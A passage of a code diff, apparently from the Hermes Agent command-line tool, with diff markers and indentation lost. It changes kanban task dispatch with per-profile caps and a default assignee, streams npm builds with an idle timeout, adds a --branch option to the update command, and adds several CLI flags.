# Tasks blocked this way go to skipped_per_profile_capped (not
# skipped_unassigned — the operator-actionable signal is different:
# "this profile is busy, try again later" not "this needs routing").
_per_profile_cap = max_in_progress_per_profile if (
isinstance(max_in_progress_per_profile, int)
and max_in_progress_per_profile > 0
) else None
_per_profile_running: dict[str, int] = {}
if _per_profile_cap is not None:
for prow in conn.execute(
"SELECT assignee, COUNT(*) AS n FROM tasks "
"WHERE status = 'running' AND assignee IS NOT NULL "
"GROUP BY assignee"
):
_per_profile_running[prow["assignee"]] = int(prow["n"])
# Normalize default_assignee once: empty/whitespace string → None so the
# rest of the loop can use ``if default_assignee:`` as a single check.
# We also resolve profile_exists once here for the same reason.
_default_assignee = (default_assignee or "").strip() or None
_default_assignee_resolved = False
if _default_assignee:
try:
from hermes_cli.profiles import profile_exists as _pe
_default_assignee_resolved = bool(_pe(_default_assignee))
except Exception:
# Profiles module not importable (test stubs, exotic envs).
# Trust the operator's config and try the assignment; the
# downstream profile_exists check on the assigned row will
# bucket it as nonspawnable if the profile genuinely isn't
# there, with the existing diagnostic.
_default_assignee_resolved = True
for row in ready_rows:
if max_spawn is not None and running_count + spawned >= max_spawn:
break
if not row["assignee"]:
result.skipped_unassigned.append(row["id"])
continue
row_assignee = row["assignee"]
if not row_assignee:
# Honour kanban.default_assignee: when the dispatcher hits an
# unassigned ready task and an operator-configured fallback
# exists, persist the assignment and proceed. This removes the
# dashboard footgun where a task created without an assignee
# parks in 'ready' forever even though the operator's intent
# ("default") was perfectly clear (#27145). Mutating the row
# (not just the in-memory view) keeps diagnostics and the
# board state consistent: the task is now legitimately owned
# by ``kanban.default_assignee``, not "unassigned but secretly
# routed".
if _default_assignee and _default_assignee_resolved:
# Dry-run: show what WOULD happen (auto-assign + spawn) without
# mutating the DB. Real run: mutate the row + emit the
# 'assigned' event so the board state matches what just happened.
if not dry_run:
try:
with write_txn(conn):
conn.execute(
"UPDATE tasks SET assignee = ? WHERE id = ? "
"AND (assignee IS NULL OR assignee = '')",
(_default_assignee, row["id"]),
)
_append_event(
conn, row["id"], "assigned",
{
"assignee": _default_assignee,
"source": "kanban.default_assignee",
},
)
except Exception:
_log.debug(
"kanban dispatch: failed to apply default_assignee=%r "
"to task %s",
_default_assignee, row["id"], exc_info=True,
)
result.skipped_unassigned.append(row["id"])
continue
row_assignee = _default_assignee
result.auto_assigned_default.append(row["id"])
else:
result.skipped_unassigned.append(row["id"])
continue
# Skip ready tasks whose assignee is not a real Hermes profile.
# `_default_spawn` invokes ``hermes -p <assignee>`` which fails
# with "Profile 'X' does not exist" when the assignee names a
@@ -5230,7 +5540,7 @@ def dispatch_once(
from hermes_cli.profiles import profile_exists # local import: avoids cycle
except Exception:
profile_exists = None # type: ignore[assignment]
if profile_exists is not None and not profile_exists(row["assignee"]):
if profile_exists is not None and not profile_exists(row_assignee):
# Bucket separately from skipped_unassigned: the operator
# cannot fix this by assigning a profile (the assignee IS the
# intended owner — a terminal lane). Health telemetry uses
@@ -5239,6 +5549,19 @@ def dispatch_once(
# of human-pulled work.
result.skipped_nonspawnable.append(row["id"])
continue
# Per-profile concurrency cap (#21582): even if there's global
# headroom, refuse to spawn for an assignee that's already at
# its in-flight cap. Prevents one profile's local model / API
# quota / browser pool from being overwhelmed by a fan-out
# while the global max_in_progress / max_spawn caps still allow
# work on OTHER profiles.
if _per_profile_cap is not None:
current = _per_profile_running.get(row_assignee, 0)
if current >= _per_profile_cap:
result.skipped_per_profile_capped.append(
(row["id"], row_assignee, current)
)
continue
# Respawn guard: refuse to re-spawn when useful work is already
# in-flight/recent, or when the last failure is a deterministic
# blocker (quota / auth). The guard defers the spawn this tick so
@@ -5261,7 +5584,15 @@ def dispatch_once(
)
continue
if dry_run:
result.spawned.append((row["id"], row["assignee"], ""))
result.spawned.append((row["id"], row_assignee, ""))
# Increment per-profile counter even in dry_run so the cap
# check sees the would-be spawn on subsequent iterations.
# Without this, dry_run reports every task as spawnable and
# under-reports the capped subset (#21582).
if _per_profile_cap is not None and row_assignee:
_per_profile_running[row_assignee] = (
_per_profile_running.get(row_assignee, 0) + 1
)
continue
claimed = claim_task(conn, row["id"], ttl_seconds=ttl_seconds)
if claimed is None:
@@ -5304,6 +5635,13 @@ def dispatch_once(
# complete_task).
result.spawned.append((claimed.id, claimed.assignee or "", str(workspace)))
spawned += 1
# Track the new in-flight count for this profile so later
# iterations in this same tick respect the per-profile cap
# (#21582). Subsequent ticks re-query from the DB.
if _per_profile_cap is not None and claimed.assignee:
_per_profile_running[claimed.assignee] = (
_per_profile_running.get(claimed.assignee, 0) + 1
)
except Exception as exc:
auto = _record_spawn_failure(
conn, claimed.id, str(exc),
+4 -4
View File
@@ -281,7 +281,7 @@ def decompose_task(
configured, API error, malformed response, decomposer returned
fanout=true with empty task list) those surface via ``ok=False``.
"""
with kb.connect() as conn:
with kb.connect_closing() as conn:
task = kb.get_task(conn, task_id)
if task is None:
return DecomposeOutcome(task_id, False, "unknown task id")
@@ -370,7 +370,7 @@ def decompose_task(
return DecomposeOutcome(
task_id, False, "decomposer returned fanout=false with no title/body",
)
with kb.connect() as conn:
with kb.connect_closing() as conn:
ok = kb.specify_triage_task(
conn,
task_id,
@@ -439,7 +439,7 @@ def decompose_task(
})
try:
with kb.connect() as conn:
with kb.connect_closing() as conn:
child_ids = kb.decompose_triage_task(
conn,
task_id,
@@ -467,7 +467,7 @@ def decompose_task(
def list_triage_ids(*, tenant: Optional[str] = None) -> list[str]:
"""Return task ids currently in the triage column."""
with kb.connect() as conn:
with kb.connect_closing() as conn:
rows = kb.list_tasks(
conn,
status="triage",
+3 -3
View File
@@ -150,7 +150,7 @@ def specify_task(
error, malformed response) those surface via ``ok=False`` so the
``--all`` sweep can continue past individual failures.
"""
with kb.connect() as conn:
with kb.connect_closing() as conn:
task = kb.get_task(conn, task_id)
if task is None:
return SpecifyOutcome(task_id, False, "unknown task id")
@@ -239,7 +239,7 @@ def specify_task(
task_id, False, "LLM response missing title and body"
)
with kb.connect() as conn:
with kb.connect_closing() as conn:
ok = kb.specify_triage_task(
conn,
task_id,
@@ -261,7 +261,7 @@ def list_triage_ids(*, tenant: Optional[str] = None) -> list[str]:
``tenant`` narrows the sweep; ``None`` returns every triage task.
"""
with kb.connect() as conn:
with kb.connect_closing() as conn:
tasks = kb.list_tasks(
conn,
status="triage",
+458 -130
View File
@@ -65,6 +65,39 @@ import os
import sys
# Mouse-tracking residue suppression — runs BEFORE every other import on the
# TUI hot path so the terminal stops emitting SGR/X10 mouse reports while the
# Python launcher is still doing imports (≈100300ms in cooked + echo mode,
# before the Node TUI takes stdin into raw mode). During that window any
# incoming bytes are echoed straight back to the user's shell scrollback as
# ``^[[<…M`` text. The TUI itself runs `resetTerminalModes()` again in
# `entry.tsx`; this is just the earlier cousin. ``HERMES_TUI_NO_EARLY_DISABLE``
# escapes the behaviour for diagnostics.
def _suppress_mouse_residue_early() -> None:
if os.environ.get("HERMES_TUI_NO_EARLY_DISABLE") == "1":
return
if not (os.environ.get("HERMES_TUI") == "1" or "--tui" in sys.argv[1:]):
return
try:
# Skip when stdout is redirected (`hermes --tui … >log`, CI capture):
# the bytes can't reach the terminal anyway and would just pollute
# the log with raw CSI.
if not os.isatty(1):
return
# Disable every mouse-tracking variant we know about. Idempotent and
# safe to send even when no tracking is currently asserted.
os.write(
1,
b"\x1b[?1003l\x1b[?1002l\x1b[?1001l\x1b[?1000l\x1b[?9l"
b"\x1b[?1006l\x1b[?1005l\x1b[?1015l\x1b[?1016l\x1b[?2029l",
)
except OSError:
pass
_suppress_mouse_residue_early()
def _is_termux_startup_environment_fast() -> bool:
"""Tiny Termux check for pre-import startup shortcuts."""
prefix = os.environ.get("PREFIX", "")
@@ -2084,6 +2117,13 @@ def cmd_postinstall(args):
def cmd_model(args):
"""Select default model — starts with provider selection, then model picker."""
_require_tty("model")
if getattr(args, "refresh", False):
try:
from hermes_cli.models import clear_provider_models_cache
clear_provider_models_cache()
print(" Cleared model picker cache.")
except Exception:
pass
select_provider_and_model(args=args)
@@ -2374,8 +2414,6 @@ def select_provider_and_model(args=None):
# Step 2: Provider-specific setup + model selection
if selected_provider == "openrouter":
_model_flow_openrouter(config, current_model)
elif selected_provider == "ai-gateway":
_model_flow_ai_gateway(config, current_model)
elif selected_provider == "nous":
_model_flow_nous(config, current_model, args=args)
elif selected_provider == "openai-codex":
@@ -2962,63 +3000,11 @@ def _model_flow_openrouter(config, current_model=""):
print("No change.")
def _model_flow_ai_gateway(config, current_model=""):
"""Vercel AI Gateway provider: ensure API key, then pick model with pricing."""
from hermes_constants import AI_GATEWAY_BASE_URL
from hermes_cli.auth import (
PROVIDER_REGISTRY,
_prompt_model_selection,
_save_model_choice,
deactivate_provider,
)
from hermes_cli.config import get_env_value
# Route through _prompt_api_key so users can replace a stale/broken key
# in-flow (K/R/C) instead of having to edit ~/.hermes/.env by hand.
pconfig = PROVIDER_REGISTRY["ai-gateway"]
existing_key = get_env_value("AI_GATEWAY_API_KEY") or ""
if not existing_key:
print(
"Create API key here: https://vercel.com/d?to=%2F%5Bteam%5D%2F%7E%2Fai-gateway&title=AI+Gateway"
)
print("Add a payment method to get $5 in free credits.")
print()
_resolved, abort = _prompt_api_key(pconfig, existing_key, provider_id="ai-gateway")
if abort:
return
from hermes_cli.models import ai_gateway_model_ids, get_pricing_for_provider
models_list = ai_gateway_model_ids(force_refresh=True)
pricing = get_pricing_for_provider("ai-gateway", force_refresh=True)
selected = _prompt_model_selection(
models_list, current_model=current_model, pricing=pricing
)
if selected:
_save_model_choice(selected)
from hermes_cli.config import load_config, save_config
cfg = load_config()
model = cfg.get("model")
if not isinstance(model, dict):
model = {"default": model} if model else {}
cfg["model"] = model
model["provider"] = "ai-gateway"
model["base_url"] = AI_GATEWAY_BASE_URL
model["api_mode"] = "chat_completions"
save_config(cfg)
deactivate_provider()
print(f"Default model set to: {selected} (via Vercel AI Gateway)")
else:
print("No change.")
def _model_flow_nous(config, current_model="", args=None):
"""Nous Portal provider: ensure logged in, then pick model."""
from hermes_cli.auth import (
get_provider_auth_state,
NOUS_INFERENCE_AUTH_MODE_LEGACY,
_prompt_model_selection,
_save_model_choice,
_update_config_for_provider,
@@ -3114,8 +3100,21 @@ def _model_flow_nous(config, current_model="", args=None):
# Fetch live pricing (non-blocking — returns empty dict on failure)
pricing = get_pricing_for_provider("nous")
# Check if user is on free tier
free_tier = check_nous_free_tier()
# Force fresh account data for model selection so recent credit purchases
# are reflected immediately.
free_tier = check_nous_free_tier(force_fresh=True)
if not free_tier:
try:
refreshed_creds = resolve_nous_runtime_credentials(
min_key_ttl_seconds=5 * 60,
inference_auth_mode=NOUS_INFERENCE_AUTH_MODE_LEGACY,
)
if refreshed_creds:
creds = refreshed_creds
except Exception:
# Runtime inference has its own paid-entitlement recovery path; do
# not block model selection if this opportunistic remint fails.
pass
# Resolve portal URL early — needed both for upgrade links and for the
# freeRecommendedModels endpoint below.
@@ -3137,7 +3136,24 @@ def _model_flow_nous(config, current_model="", args=None):
# newly-launched paid models surface in the picker too — independent
# of CLI release cadence.
unavailable_models: list[str] = []
unavailable_message = ""
if free_tier:
try:
from hermes_cli.nous_account import (
format_nous_portal_entitlement_message,
get_nous_portal_account_info,
)
_account_info = get_nous_portal_account_info(force_fresh=True)
unavailable_message = (
format_nous_portal_entitlement_message(
_account_info,
capability="paid Nous models",
)
or ""
)
except Exception:
unavailable_message = ""
model_ids, pricing = union_with_portal_free_recommendations(
model_ids, pricing, _nous_portal_url,
)
@@ -3159,7 +3175,7 @@ def _model_flow_nous(config, current_model="", args=None):
from hermes_cli.auth import DEFAULT_NOUS_PORTAL_URL
_url = (_nous_portal_url or DEFAULT_NOUS_PORTAL_URL).rstrip("/")
print(f"Upgrade at {_url} to access paid models.")
print(unavailable_message or f"Upgrade at {_url} to access paid models.")
return
print(
@@ -3172,6 +3188,7 @@ def _model_flow_nous(config, current_model="", args=None):
pricing=pricing,
unavailable_models=unavailable_models,
portal_url=_nous_portal_url,
unavailable_message=unavailable_message,
)
if selected:
_save_model_choice(selected)
@@ -6499,6 +6516,104 @@ def _web_ui_build_needed(web_dir: Path) -> bool:
return False
def _run_with_idle_timeout(
cmd: list[str],
cwd: Path,
*,
idle_timeout_seconds: int = 180,
indent: str = " ",
) -> subprocess.CompletedProcess:
"""Run a subprocess that streams output, with an idle-output timeout.
Issue #33788: ``npm run build`` (Vite) was invoked with
``capture_output=True`` and no timeout. On low-memory hosts (notably
WSL2 with the default 4 GB cap) the build can stall or sit silent for
minutes; users see a frozen terminal, assume the update is hung, and
reboot leaving the editable install in a half-state with the
``hermes`` launcher present but ``hermes_cli`` not importable.
This helper fixes both halves: stdout is streamed (so the user sees
progress), and if no bytes have appeared on stdout/stderr for
``idle_timeout_seconds``, the process is terminated and the call
returns with a non-zero ``returncode``. The caller's existing
stale-dist fallback (#23817) takes over from there.
Returns a ``CompletedProcess`` with merged stdout (text), empty
stderr, and an integer returncode. Never raises on idle timeout
propagation of failure is via the returncode.
"""
merged_chunks: list[str] = []
last_output_ts = _time.monotonic()
lock = threading.Lock()
try:
proc = subprocess.Popen(
cmd,
cwd=cwd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True,
encoding="utf-8",
errors="replace",
bufsize=1,
)
except OSError as exc:
# E.g. npm not on PATH between the which() check and now.
return subprocess.CompletedProcess(cmd, 127, stdout="", stderr=str(exc))
def _reader() -> None:
nonlocal last_output_ts
assert proc.stdout is not None
for line in proc.stdout:
try:
print(f"{indent}{line.rstrip()}", flush=True)
except UnicodeEncodeError:
# Windows cp1252 fallback — same pattern as _say().
enc = getattr(sys.stdout, "encoding", None) or "ascii"
safe = line.rstrip().encode(enc, errors="replace").decode(enc, errors="replace")
print(f"{indent}{safe}", flush=True)
with lock:
merged_chunks.append(line)
last_output_ts = _time.monotonic()
reader_thread = threading.Thread(target=_reader, daemon=True)
reader_thread.start()
idle_killed = False
while True:
try:
rc = proc.wait(timeout=5)
break
except subprocess.TimeoutExpired:
with lock:
idle = _time.monotonic() - last_output_ts
if idle > idle_timeout_seconds:
idle_killed = True
proc.terminate()
try:
rc = proc.wait(timeout=3)
except subprocess.TimeoutExpired:
proc.kill()
rc = proc.wait()
break
# Drain reader so we don't leak the stdout file descriptor.
reader_thread.join(timeout=2)
combined = "".join(merged_chunks)
if idle_killed:
msg = (
f"\n ⚠ Build produced no output for {idle_timeout_seconds}s — terminated.\n"
" Common causes: out-of-memory on a low-RAM host (WSL/container),\n"
" a stuck Node process, or an antivirus scan stalling I/O.\n"
)
combined += msg
# Force a non-zero rc even if terminate() raced with a clean exit.
if rc == 0:
rc = 124 # GNU `timeout` convention
return subprocess.CompletedProcess(cmd, rc, stdout=combined, stderr="")
def _run_npm_install_deterministic(
npm: str,
cwd: Path,
@@ -6604,31 +6719,26 @@ def _build_web_ui(web_dir: Path, *, fatal: bool = False) -> bool:
if fatal:
_say(" Run manually: cd web && npm install && npm run build")
return False
# First attempt
r2 = subprocess.run(
[npm, "run", "build"],
cwd=web_dir,
capture_output=True,
text=True,
encoding="utf-8",
errors="replace",
)
# First attempt — stream output via idle-timeout helper (issue #33788).
# capture_output=True on a long Vite build looks identical to a hang;
# users react by rebooting, which leaves the editable install in a
# half-state. Streaming + idle-kill makes failures observable AND
# recoverable (the stale-dist fallback below handles the kill path).
r2 = _run_with_idle_timeout([npm, "run", "build"], cwd=web_dir)
if r2.returncode != 0:
# Retry once after a short delay — covers boot-time races on Windows
# (antivirus scanning Node.js binaries, npm cache not ready, transient
# I/O when launched via Scheduled Task at logon). See issue #23817.
_time.sleep(3)
r2 = subprocess.run(
[npm, "run", "build"],
cwd=web_dir,
capture_output=True,
text=True,
encoding="utf-8",
errors="replace",
)
r2 = _run_with_idle_timeout([npm, "run", "build"], cwd=web_dir)
if r2.returncode != 0:
stderr_preview = (r2.stderr or "").strip()
# _run_with_idle_timeout merges stderr into stdout; older callers
# using subprocess.run kept them split. Pull from whichever has
# content so the error surfaces regardless of which path produced
# the CompletedProcess.
build_output = (r2.stderr or "") + (r2.stdout or "")
stderr_preview = build_output.strip()
stderr_tail = "\n ".join(stderr_preview.splitlines()[-10:]) if stderr_preview else ""
dist_dir = web_dir.parent / "hermes_cli" / "web_dist"
dist_index = dist_dir / "index.html"
@@ -6988,7 +7098,25 @@ def _update_via_zip(args):
import zipfile
from urllib.request import urlretrieve
branch = "main"
# The ZIP fallback exists for Windows git-file-I/O breakage. It pulls a
# static archive from GitHub, which is fine for the default "main"
# channel but would silently ignore --branch and update from main even
# if the user asked for something else — exactly the silent-divergence
# bug --branch was added to prevent. Refuse to proceed in that case
# rather than lie.
branch = _resolve_update_branch(args)
if branch != "main":
print(
f"✗ --branch={branch} is not supported on the Windows ZIP-fallback "
"update path."
)
print(
" This path runs when git file I/O is broken on the system. "
"Either resolve the git-side breakage (typically an antivirus "
"or NTFS filter holding files open) and rerun `hermes update "
f"--branch {branch}`, or update against main with `hermes update`."
)
sys.exit(1)
zip_url = (
f"https://github.com/NousResearch/hermes-agent/archive/refs/heads/{branch}.zip"
)
@@ -7101,6 +7229,11 @@ def _update_via_zip(args):
_install_python_dependencies_with_optional_fallback(pip_cmd)
_update_node_dependencies()
# Core (Python deps + git pull / ZIP extract) is now complete; the CLI
# is functional from this point onward. The web UI build below is
# optional — a failure here only affects ``hermes dashboard``. Make
# that visible so users don't panic and reboot mid-build (#33788).
print("→ Core update complete. Building dashboard (optional)...")
_build_web_ui(PROJECT_ROOT / "web")
# Sync skills
@@ -8129,37 +8262,18 @@ def _install_psutil_android_compat(
nothing is persisted in the repository.
Stopgap: remove this once https://github.com/giampaolo/psutil/pull/2762
merges and ships in a release. ``scripts/install_psutil_android.py``
contains the same logic for ``scripts/install.sh`` (fresh installs).
Both copies should be removed together.
merges and ships in a release. The standalone installer script uses the
same shared helper and should be removed together.
"""
import tarfile
import tempfile
import urllib.request
psutil_url = (
"https://files.pythonhosted.org/packages/aa/c6/"
"d1ddf4abb55e93cebc4f2ed8b5d6dbad109ecb8d63748dd2b20ab5e57ebe/"
"psutil-7.2.2.tar.gz"
)
from hermes_cli.psutil_android import PSUTIL_URL, prepare_patched_psutil_sdist
with tempfile.TemporaryDirectory() as tmp:
tmp_path = Path(tmp)
archive = tmp_path / "psutil.tar.gz"
urllib.request.urlretrieve(psutil_url, archive)
with tarfile.open(archive) as tar:
tar.extractall(tmp_path)
src_root = next(
p for p in tmp_path.iterdir() if p.is_dir() and p.name.startswith("psutil-")
)
common_py = src_root / "psutil" / "_common.py"
content = common_py.read_text(encoding="utf-8")
marker = 'LINUX = sys.platform.startswith("linux")'
replacement = 'LINUX = sys.platform.startswith(("linux", "android"))'
if marker not in content:
raise RuntimeError("psutil Android compatibility patch marker not found")
common_py.write_text(content.replace(marker, replacement), encoding="utf-8")
urllib.request.urlretrieve(PSUTIL_URL, archive)
src_root = prepare_patched_psutil_sdist(archive, tmp_path)
_run_install_with_heartbeat(
install_cmd_prefix + ["install", "--no-build-isolation", str(src_root)],
@@ -8395,13 +8509,44 @@ def _finalize_update_output(state):
pass
def _cmd_update_check():
"""Implement ``hermes update --check``: fetch and report without installing."""
def _resolve_update_branch(args) -> str:
"""Normalize ``args.branch`` into a non-empty branch name.
Centralizes the "default to main, accept --branch override, treat empty
or whitespace-only values as the default" parsing so every consumer of
``--branch`` (check path, git-update path, ZIP-fallback path) agrees on
the same answer.
"""
return (getattr(args, "branch", None) or "main").strip() or "main"
def _cmd_update_check(branch: str = "main", *, branch_explicit: bool = False):
"""Implement ``hermes update --check``: fetch and report without installing.
``branch`` selects which branch the check compares against. Default is
"main"; callers can pass another branch to ask "are there new commits
on origin/<branch>?" without performing the update.
``branch_explicit`` is True iff the caller passed --branch on the CLI.
PyPI installs can't honor non-default branches, so when this is True
on a PyPI install we surface a one-line notice instead of silently
dropping the flag.
"""
from hermes_cli.config import detect_install_method
method = detect_install_method(PROJECT_ROOT)
if method == "docker":
# Docker can't ``git fetch`` from within the container. Surface the
# same long-form ``docker pull`` guidance ``hermes update`` (apply
# path) uses — telling the user to "reinstall via curl" or that
# ".git is missing" would point them at the wrong remediation.
from hermes_cli.config import format_docker_update_message
print(format_docker_update_message())
sys.exit(1)
if method == "pip":
from hermes_cli.config import recommended_update_command
from hermes_cli.banner import check_via_pypi
if branch_explicit and branch != "main":
print(f"⚠ --branch is ignored for PyPI installs (would have checked '{branch}').")
result = check_via_pypi()
if result is None:
print("✗ Could not reach PyPI to check for updates.")
@@ -8422,16 +8567,34 @@ def _cmd_update_check():
if sys.platform == "win32":
git_cmd = ["git", "-c", "windows.appendAtomically=false"]
# Fetch both origin and upstream; prefer upstream as the canonical reference
print("→ Fetching from upstream...")
fetch_result = subprocess.run(
git_cmd + ["fetch", "upstream"],
cwd=PROJECT_ROOT,
capture_output=True,
text=True,
)
if fetch_result.returncode != 0:
# Fallback to origin if upstream doesn't exist
# Fetch both origin and upstream; prefer upstream as the canonical reference.
# Note: upstream/<branch> may not exist for non-main branches (a fork's
# bb/gui has no upstream counterpart), so when the caller picks a
# non-default branch we skip the upstream probe and use origin directly.
if branch == "main":
print("→ Fetching from upstream...")
fetch_result = subprocess.run(
git_cmd + ["fetch", "upstream"],
cwd=PROJECT_ROOT,
capture_output=True,
text=True,
)
if fetch_result.returncode != 0:
# Fallback to origin if upstream doesn't exist
print("→ Fetching from origin...")
fetch_result = subprocess.run(
git_cmd + ["fetch", "origin"],
cwd=PROJECT_ROOT,
capture_output=True,
text=True,
)
upstream_exists = False
compare_branch = f"origin/{branch}"
else:
upstream_exists = True
compare_branch = f"upstream/{branch}"
else:
# Non-default branch: compare against origin/<branch> directly.
print("→ Fetching from origin...")
fetch_result = subprocess.run(
git_cmd + ["fetch", "origin"],
@@ -8440,10 +8603,7 @@ def _cmd_update_check():
text=True,
)
upstream_exists = False
compare_branch = "origin/main"
else:
upstream_exists = True
compare_branch = "upstream/main"
compare_branch = f"origin/{branch}"
if fetch_result.returncode != 0:
stderr = fetch_result.stderr.strip()
@@ -8457,6 +8617,20 @@ def _cmd_update_check():
print(f" {stderr.splitlines()[0]}")
sys.exit(1)
# Verify the compare ref actually exists before asking rev-list about it.
# Without this, `git rev-list HEAD..origin/<bogus> --count` exits 128 and
# (with check=True) raises CalledProcessError, surfacing a Python
# traceback. Friendlier to detect-and-report.
verify_result = subprocess.run(
git_cmd + ["rev-parse", "--verify", "--quiet", compare_branch],
cwd=PROJECT_ROOT,
capture_output=True,
text=True,
)
if verify_result.returncode != 0:
print(f"✗ Branch '{branch}' not found on {compare_branch.split('/', 1)[0]}.")
sys.exit(1)
rev_result = subprocess.run(
git_cmd + ["rev-list", f"HEAD..{compare_branch}", "--count"],
cwd=PROJECT_ROOT,
@@ -8668,14 +8842,35 @@ def cmd_update(args):
runs the update, then restores stdio on the way out (even on
``sys.exit`` or unhandled exceptions).
"""
from hermes_cli.config import is_managed, managed_error
from hermes_cli.config import (
detect_install_method,
format_docker_update_message,
is_managed,
managed_error,
)
if is_managed():
managed_error("update Hermes Agent")
return
# Docker users can't ``git pull`` — the image excludes ``.git`` from
# the build context. Bail with a friendly explanation pointing at
# ``docker pull`` BEFORE any of the apply-path / check-path branches
# below get a chance to error out with misleading "Not a git
# repository" text. See format_docker_update_message() for the full
# rationale and tag-pinning / config-persistence notes.
if detect_install_method(PROJECT_ROOT) == "docker":
print(format_docker_update_message())
sys.exit(1)
if getattr(args, "check", False):
_cmd_update_check()
# --check honors --branch so the "any new commits?" answer matches
# what a subsequent `hermes update --branch=<x>` would actually pull.
branch = _resolve_update_branch(args)
_cmd_update_check(
branch=branch,
branch_explicit=bool(getattr(args, "branch", None)),
)
return
gateway_mode = getattr(args, "gateway", False)
@@ -8835,26 +9030,57 @@ def _cmd_update_impl(args, gateway_mode: bool):
)
current_branch = result.stdout.strip()
# Always update against main
branch = "main"
# Determine the target branch. Default is "main" (the long-standing
# CLI behavior); --branch overrides for callers that want to update
# against a non-default channel.
branch = _resolve_update_branch(args)
# If user is on a non-main branch or detached HEAD, switch to main
if current_branch != "main":
# If user is on a different branch than the update target, switch
# to the target. When the target is "main" this is the historical
# "always update against main" behavior; for any other target it's
# the same thing — get HEAD onto the requested branch first, then
# fast-forward.
if current_branch != branch:
label = (
"detached HEAD"
if current_branch == "HEAD"
else f"branch '{current_branch}'"
)
print(f" ⚠ Currently on {label} — switching to main for update...")
print(f" ⚠ Currently on {label} — switching to {branch} for update...")
# Stash before checkout so uncommitted work isn't lost
auto_stash_ref = _stash_local_changes_if_needed(git_cmd, PROJECT_ROOT)
subprocess.run(
git_cmd + ["checkout", "main"],
checkout_result = subprocess.run(
git_cmd + ["checkout", branch],
cwd=PROJECT_ROOT,
capture_output=True,
text=True,
check=True,
)
if checkout_result.returncode != 0:
# Local checkout doesn't have this branch yet. Try to set
# it up as a tracking branch of origin/<branch>. This is
# the common case when the requested branch exists upstream
# but was never checked out locally.
track_result = subprocess.run(
git_cmd + ["checkout", "-B", branch, f"origin/{branch}"],
cwd=PROJECT_ROOT,
capture_output=True,
text=True,
)
if track_result.returncode != 0:
# Restore the user's prior branch + stash before bailing
# so we don't leave them stranded in a weird state.
if auto_stash_ref is not None:
_restore_stashed_changes(
git_cmd,
PROJECT_ROOT,
auto_stash_ref,
prompt_user=False,
input_fn=gw_input_fn,
)
print(f"✗ Branch '{branch}' does not exist locally or on origin.")
if track_result.stderr.strip():
print(f" {track_result.stderr.strip().splitlines()[0]}")
sys.exit(1)
else:
auto_stash_ref = _stash_local_changes_if_needed(git_cmd, PROJECT_ROOT)
@@ -8876,6 +9102,11 @@ def _cmd_update_impl(args, gateway_mode: bool):
if commit_count == 0:
_invalidate_update_cache()
# Even if origin is up to date, the fork may be behind upstream
if is_fork and branch == "main":
_sync_with_upstream_if_needed(git_cmd, PROJECT_ROOT)
# Restore stash and switch back to original branch if we moved
if auto_stash_ref is not None:
_restore_stashed_changes(
@@ -8885,7 +9116,7 @@ def _cmd_update_impl(args, gateway_mode: bool):
prompt_user=prompt_for_restore,
input_fn=gw_input_fn,
)
if current_branch not in {"main", "HEAD"}:
if current_branch not in {branch, "HEAD"}:
subprocess.run(
git_cmd + ["checkout", current_branch],
cwd=PROJECT_ROOT,
@@ -8907,7 +9138,7 @@ def _cmd_update_impl(args, gateway_mode: bool):
try:
from hermes_cli.backup import create_quick_snapshot
snap_id = create_quick_snapshot(label="pre-update")
snap_id = create_quick_snapshot(label="pre-update", keep=1)
if snap_id:
print(f" ✓ Pre-update snapshot: {snap_id}")
except Exception as exc:
@@ -8947,7 +9178,7 @@ def _cmd_update_impl(args, gateway_mode: bool):
if reset_result.stderr.strip():
print(f" {reset_result.stderr.strip()}")
print(
" Try manually: git fetch origin && git reset --hard origin/main"
f" Try manually: git fetch origin && git reset --hard origin/{branch}"
)
sys.exit(1)
@@ -9077,6 +9308,10 @@ def _cmd_update_impl(args, gateway_mode: bool):
_refresh_active_lazy_features()
_update_node_dependencies()
# See note above (ZIP path): core is now complete, web UI build is
# optional from a CLI perspective. Telegraphing this avoids the
# "stuck at webui-build → reboot → broken install" trap (#33788).
print("→ Core update complete. Building dashboard (optional)...")
_build_web_ui(PROJECT_ROOT / "web")
print()
@@ -10683,6 +10918,22 @@ def cmd_dashboard(args):
sys.exit(1)
print(f"→ Skipping web UI build (--skip-build); using dist at {_dist_root}")
# Discover and load plugins so any DashboardAuthProvider plugin
# (e.g. plugins/dashboard_auth/nous) registers BEFORE start_server's
# fail-closed gate check runs. The top-level argparse setup skips
# plugin discovery for built-in subcommands like ``dashboard`` to
# save ~500ms startup; we have to trigger it explicitly here because
# the dashboard's server-side runtime depends on plugin-registered
# providers (image_gen, web, dashboard_auth, …).
try:
from hermes_cli.plugins import discover_plugins
discover_plugins()
except Exception as exc:
# Discovery failures must not block dashboard startup outright —
# log and proceed; the gate's fail-closed branch will surface
# the missing-provider state if it matters.
print(f"⚠ Plugin discovery failed: {exc}", file=sys.stderr)
from hermes_cli.web_server import start_server
embedded_chat = args.tui or os.environ.get("HERMES_DASHBOARD_TUI") == "1"
@@ -11067,6 +11318,11 @@ def main():
help="Select default model and provider",
description="Interactively select your inference provider and default model",
)
model_parser.add_argument(
"--refresh",
action="store_true",
help="Wipe the model picker disk cache and re-fetch every provider's live /v1/models list.",
)
model_parser.add_argument(
"--portal-url",
help="Portal base URL for Nous login (default: production portal)",
@@ -11253,6 +11509,19 @@ def main():
action="store_true",
help="Replace any existing gateway instance (useful for systemd)",
)
gateway_run.add_argument(
"--no-supervise",
action="store_true",
help=(
"Inside the s6-overlay Docker image, normally `gateway run` is "
"automatically redirected to the supervised s6 service (so the "
"gateway gets auto-restart on crash, plus a supervised dashboard "
"if HERMES_DASHBOARD is set). Pass --no-supervise to opt out and "
"get the historical pre-s6 foreground behavior: the gateway is "
"the container's main process and the container exits with the "
"gateway's exit code. No effect outside an s6 container."
),
)
_add_accept_hooks_flag(gateway_run)
_add_accept_hooks_flag(gateway_parser)
@@ -12399,6 +12668,11 @@ Examples:
],
)
skills_search.add_argument("--limit", type=int, default=10, help="Max results")
skills_search.add_argument(
"--json",
action="store_true",
help="Output JSON instead of a table (full identifiers, scripting-friendly)",
)
skills_install = skills_subparsers.add_parser("install", help="Install a skill")
skills_install.add_argument(
@@ -12496,6 +12770,31 @@ Examples:
help="Skip confirmation prompt when using --restore",
)
skills_repair_official = skills_subparsers.add_parser(
"repair-official",
help="Backfill or restore official optional skills from repo source",
description=(
"Repair official optional skill provenance. By default, only backfills "
"hub metadata for exact matches. Pass --restore to replace missing or "
"mutated active copies from optional-skills/, moving existing copies to "
"a restore backup first. Use name 'all' to repair every optional skill."
),
)
skills_repair_official.add_argument(
